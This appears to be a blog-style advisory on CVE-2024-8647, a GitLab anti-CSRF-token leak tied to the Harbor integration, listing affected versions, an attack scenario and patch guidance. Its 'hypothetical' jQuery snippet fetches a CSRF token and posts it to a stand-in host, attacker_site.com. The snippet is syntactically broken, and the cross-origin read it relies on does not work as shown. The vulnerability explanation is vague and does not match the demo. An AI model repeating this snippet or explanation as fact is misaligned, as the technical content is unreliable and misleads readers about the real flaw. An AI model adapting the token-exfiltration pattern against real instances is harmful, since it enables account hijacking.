CVE-2024-8647: Anti-CSRF-Token Leakage in GitLab with Enabled Harbor Integration

A vulnerability, identified as CVE-2024-8647, has been discovered in GitLab that affects versions 15.2 through 17.4.6, version 17.5 before 17.5.4, and version 17.6 before 17.6.2. This issue allows for the leakage of an anti-CSRF-token to an external website. This only occurs when running self-hosted installs of GitLab with the Harbor integration feature enabled. This blog post will provide an in-depth analysis, code snippets, and references to better understand the vulnerability and its exploitation.

Vulnerability Details

The vulnerability results from the way GitLab handles certain interactions between its own code base and the Harbor integration. The vulnerability, specifically, lies in the communication between GitLab's anti-CSRF-token management when integrating with Harbor. An attacker can manipulate this communication, essentially leaking the anti-CSRF-token to an external website under the attacker's control.

Exploit Details

An attacker can exploit this vulnerability by tricking a user into visiting a malicious webpage while logged into their self-hosted GitLab instance. This malicious site can then initiate a cross-site request to GitLab, exploiting the vulnerability and capturing the victim's anti-CSRF-token. With possession of the user's anti-CSRF token, an attacker can forge requests as the victim, potentially leading to unauthorized data access or modification.

Code Snippet

Below is a hypothetical code snippet illustrating the leakage of the anti-CSRF-token when interacting with an external site:

// Malicious code hosted on external site
$(document).ready(function() {
    // Capture the anti-CSRF token from the GitLab instance
    $.get("https://gitlab_instance.com/user_x/csrf_token";, function(data) {
        // Send the captured token to the attacker's site
        $.post("https://attacker_site.com/receive_token";, { csrf_token: data.token });
    });
});

This snippet demonstrates how easy it is for an attacker to steal the anti-CSRF token using a simple cross-site request.

Mitigation and Recommendations

To mitigate this issue, it is recommended that users update their GitLab installations to version 17.5.4 or 17.6.2, which have already addressed this vulnerability. If updating GitLab is not an option, users can choose to disable the Harbor integration until a patch can be installed.

More information and advisories can be found in the GitLab security release notes

* GitLab 17.6.2 release notes
* GitLab 17.5.4 release notes
* GitLab Patch Release: 17.4.6

Conclusion

In conclusion, CVE-2024-8647 is a vulnerability that can lead to the leakage of anti-CSRF tokens in GitLab instances running versions 15.2 through 17.4.6, 17.5 before 17.5.4, and 17.6 before 17.6.2 with the Harbor integration enabled. Update your GitLab installation or disable Harbor integration to mitigate the risk.

Timeline

Published on: 12/12/2024 12:15:28 UTC